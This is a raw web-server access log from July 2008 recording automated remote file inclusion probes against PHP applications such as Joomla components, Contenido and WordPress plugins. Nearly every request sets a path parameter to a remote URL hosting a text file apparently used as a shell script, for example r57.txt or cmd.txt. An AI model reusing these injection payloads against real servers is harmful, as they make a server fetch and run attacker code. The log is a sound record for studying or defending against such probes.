194.79.75.195 - - [29/Jul/2008:08:25:55 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:25:55 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
85.25.10.95 - - [29/Jul/2008:08:26:11 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
194.79.75.195 - - [29/Jul/2008:08:26:13 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:14 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:14 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
85.25.10.95 - - [29/Jul/2008:08:26:14 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.25.10.95 - - [29/Jul/2008:08:26:17 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
194.79.75.195 - - [29/Jul/2008:08:26:17 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:18 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:18 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:20 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:20 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:08:26:21 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
200.99.76.3 - - [29/Jul/2008:08:26:24 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:08:26:25 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:08:26:25 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
85.25.10.95 - - [29/Jul/2008:08:26:30 -0500] "GET /logs/access_log.1211068800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
200.99.76.3 - - [29/Jul/2008:08:26:56 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:08:26:57 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.106.241.204 - - [29/Jul/2008:08:28:18 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.106.241.204 - - [29/Jul/2008:08:28:18 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.85.201.66 - - [29/Jul/2008:08:29:52 -0500] "GET /logs/errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
70.85.201.66 - - [29/Jul/2008:08:29:53 -0500] "GET /errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
74.50.13.190 - - [29/Jul/2008:08:29:55 -0500] "GET /logs/access_log.1213315200/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
74.50.13.190 - - [29/Jul/2008:08:30:00 -0500] "GET /logs/access_log.1213142400/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
202.155.5.40 - - [29/Jul/2008:08:30:19 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 331 "-""Mozilla/3.0 (OS/2; U)"
202.155.5.40 - - [29/Jul/2008:08:30:19 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 326 "-""Mozilla/3.0 (OS/2; U)"
202.155.5.40 - - [29/Jul/2008:08:30:19 -0500] "GET /logs/access_log.1214784000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 353 "-""Mozilla/3.0 (OS/2; U)"
202.155.5.40 - - [29/Jul/2008:08:30:25 -0500] "GET /logs/access_log.1214870400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 353 "-""Mozilla/3.0 (OS/2; U)"
74.55.183.82 - - [29/Jul/2008:08:31:26 -0500] "GET /logs/db.php?commonpath=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.813"
74.55.183.82 - - [29/Jul/2008:08:31:26 -0500] "GET /db.php?commonpath=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.813"
217.20.116.93 - - [29/Jul/2008:08:33:39 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.0" 404 323 "-""libwww-perl/5.48"
190.54.62.66 - - [29/Jul/2008:08:36:46 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:08:37:08 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
190.54.62.66 - - [29/Jul/2008:08:37:11 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:08:38:56 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.99.76.3 - - [29/Jul/2008:08:38:57 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
212.50.0.218 - - [29/Jul/2008:08:41:16 -0500] "GET /logs/access_log.1213315200/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
212.50.0.218 - - [29/Jul/2008:08:41:16 -0500] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
212.50.0.218 - - [29/Jul/2008:08:41:17 -0500] "GET /logs/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://crystalworks.com/readme1.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
74.55.183.82 - - [29/Jul/2008:08:41:48 -0500] "GET /logs//akocomments.php/mwchat/libs/start_lobby.php=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 377 "-""libwww-perl/5.813"
74.55.183.82 - - [29/Jul/2008:08:41:48 -0500] "GET //akocomments.php/mwchat/libs/start_lobby.php=http://rjoos.ch/Reise/images/tOtti/help.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.813"
87.244.11.20 - - [29/Jul/2008:08:42:23 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
87.244.11.20 - - [29/Jul/2008:08:42:23 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:08:43:50 -0500] "GET /logs/includes/db_adodb.php?baseDir=http://purearcade.com/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:08:43:51 -0500] "GET /includes/db_adodb.php?baseDir=http://purearcade.com/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
74.6.18.231 - - [29/Jul/2008:08:45:54 -0500] "GET /logs/access_log.1206230400 HTTP/1.0" 200 195475 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.196.2.205 - - [29/Jul/2008:08:48:31 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
190.196.2.205 - - [29/Jul/2008:08:48:32 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
190.196.2.205 - - [29/Jul/2008:08:50:47 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
190.196.2.205 - - [29/Jul/2008:08:50:48 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
195.5.163.212 - - [29/Jul/2008:08:54:44 -0500] "GET /logs/portfolio/msg/view.php?av=http://purearcade.com/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:08:54:44 -0500] "GET /portfolio/msg/view.php?av=http://purearcade.com/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.223.3.98 - - [29/Jul/2008:08:55:43 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:08:55:43 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:08:55:44 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:08:55:47 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:08:55:47 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
89.223.3.98 - - [29/Jul/2008:08:55:49 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
93.93.112.23 - - [29/Jul/2008:08:56:34 -0500] "GET /logs/access_log.1212883200//gallery/displayCategory.php?basepath=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
93.93.112.23 - - [29/Jul/2008:08:56:35 -0500] "GET //gallery/displayCategory.php?basepath=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
93.93.112.23 - - [29/Jul/2008:08:56:35 -0500] "GET /logs//gallery/displayCategory.php?basepath=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
89.223.3.98 - - [29/Jul/2008:08:57:47 -0500] "GET /logs/access_log.1214438400//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
65.167.141.55 - - [29/Jul/2008:08:59:13 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 200 131072 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
85.14.221.111 - - [29/Jul/2008:08:59:20 -0500] "GET /logs/access_log.1212883200/index.php?go=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
85.14.221.111 - - [29/Jul/2008:08:59:20 -0500] "GET /index.php?go=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
85.14.221.111 - - [29/Jul/2008:08:59:20 -0500] "GET /logs/index.php?go=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
70.85.201.66 - - [29/Jul/2008:09:00:08 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
89.218.85.18 - - [29/Jul/2008:09:02:01 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
82.165.43.63 - - [29/Jul/2008:09:02:01 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
89.218.85.18 - - [29/Jul/2008:09:02:02 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
82.165.43.63 - - [29/Jul/2008:09:02:02 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:09:02:05 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:09:02:06 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:09:02:16 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:09:02:16 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
82.165.43.63 - - [29/Jul/2008:09:04:39 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
82.165.43.63 - - [29/Jul/2008:09:04:40 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
88.84.151.157 - - [29/Jul/2008:09:05:08 -0500] "GET /logs//header.php?base_folder=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:09:05:08 -0500] "GET //header.php?base_folder=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:09:05:09 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
88.84.151.157 - - [29/Jul/2008:09:05:09 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
70.84.182.98 - - [29/Jul/2008:09:05:16 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
70.84.182.98 - - [29/Jul/2008:09:05:16 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
195.42.160.22 - - [29/Jul/2008:09:05:29 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.0" 200 92995 "-""libwww-perl/5.48"
195.42.160.22 - - [29/Jul/2008:09:05:30 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.0" 200 1231 "-""libwww-perl/5.48"
195.42.160.22 - - [29/Jul/2008:09:05:36 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.0" 200 92995 "-""libwww-perl/5.48"
195.42.160.22 - - [29/Jul/2008:09:05:37 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.0" 200 1231 "-""libwww-perl/5.48"
70.84.182.98 - - [29/Jul/2008:09:05:37 -0500] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.810"
70.84.182.98 - - [29/Jul/2008:09:05:38 -0500] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
65.98.89.90 - - [29/Jul/2008:09:08:26 -0500] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
65.98.89.90 - - [29/Jul/2008:09:08:26 -0500] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
89.111.173.45 - - [29/Jul/2008:09:09:58 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
89.111.173.45 - - [29/Jul/2008:09:09:59 -0500] "GET //htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.14.221.111 - - [29/Jul/2008:09:10:33 -0500] "GET /logs/access_log.1213315200/index.php?go=http://neu_2.lasrv-1.de/web/%20/.../ident.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
200.87.129.138 - - [29/Jul/2008:09:10:57 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
200.87.129.138 - - [29/Jul/2008:09:10:59 -0500] "GET //htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
69.94.30.30 - - [29/Jul/2008:09:11:14 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
69.94.30.30 - - [29/Jul/2008:09:11:14 -0500] "GET //ashnews.php?pathtoashnews=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
200.87.129.138 - - [29/Jul/2008:09:11:53 -0500] "GET /logs/access_log.1214438400//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
200.87.129.138 - - [29/Jul/2008:09:11:55 -0500] "GET //htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.87.129.138 - - [29/Jul/2008:09:11:57 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
89.108.67.119 - - [29/Jul/2008:09:12:52 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
89.108.67.119 - - [29/Jul/2008:09:12:52 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
89.108.67.119 - - [29/Jul/2008:09:13:01 -0500] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
89.108.67.119 - - [29/Jul/2008:09:13:01 -0500] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
89.223.3.98 - - [29/Jul/2008:09:13:15 -0500] "GET /logs/access_log.1214438400//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
190.196.5.189 - - [29/Jul/2008:09:13:54 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
190.196.5.189 - - [29/Jul/2008:09:13:56 -0500] "GET //htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:09:14:00 -0500] "GET /logs/mod.php?mod=siteinfo&id=http://purearcade.com/id.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:09:14:00 -0500] "GET /mod.php?mod=siteinfo&id=http://purearcade.com/id.txt? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
89.223.3.98 - - [29/Jul/2008:09:14:57 -0500] "GET /logs/access_log.1212883200//Neos_Chronos/header.php?base_folder=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
64.38.22.250 - - [29/Jul/2008:09:17:17 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/r57.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:09:17:17 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://emark.sk/new/vnc/r57.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
89.111.173.45 - - [29/Jul/2008:09:17:51 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
89.111.173.45 - - [29/Jul/2008:09:17:51 -0500] "GET //htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
190.196.5.189 - - [29/Jul/2008:09:18:53 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
190.196.5.189 - - [29/Jul/2008:09:18:55 -0500] "GET //htmltonuke.php?filnavn=http://www.markus-wecker.de/mambots/search/.../sistem.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.38.22.250 - - [29/Jul/2008:09:18:59 -0500] "GET /logs//s_e404.php?error=http://emark.sk/new/vnc/r57.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:09:18:59 -0500] "GET //s_e404.php?error=http://emark.sk/new/vnc/r57.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
74.6.18.231 - - [29/Jul/2008:09:19:22 -0500] "GET /logs/access_log.1201737600 HTTP/1.0" 200 230360 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.5.163.212 - - [29/Jul/2008:09:20:39 -0500] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
195.5.163.212 - - [29/Jul/2008:09:20:40 -0500] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
74.6.18.231 - - [29/Jul/2008:09:21:58 -0500] "GET /artwork/paintings.htm HTTP/1.0" 200 2300 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.110.178.66 - - [29/Jul/2008:09:22:45 -0500] "GET /logs/index.php?sourcedir=http://www.asa.ba/eng/cache/citi/idnou.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.800"
220.110.178.66 - - [29/Jul/2008:09:22:45 -0500] "GET /index.php?sourcedir=http://www.asa.ba/eng/cache/citi/idnou.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
64.38.22.250 - - [29/Jul/2008:09:23:26 -0500] "GET /logs//reports/errors.php?error=http://emark.sk/new/vnc/r57.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
64.38.22.250 - - [29/Jul/2008:09:23:26 -0500] "GET //reports/errors.php?error=http://emark.sk/new/vnc/r57.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
217.20.138.101 - - [29/Jul/2008:09:23:51 -0500] "GET /logs/access_log.1212883200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
217.20.138.101 - - [29/Jul/2008:09:23:52 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
217.20.138.101 - - [29/Jul/2008:09:23:52 -0500] "GET /logs//modules/xoopsgallery/upgrad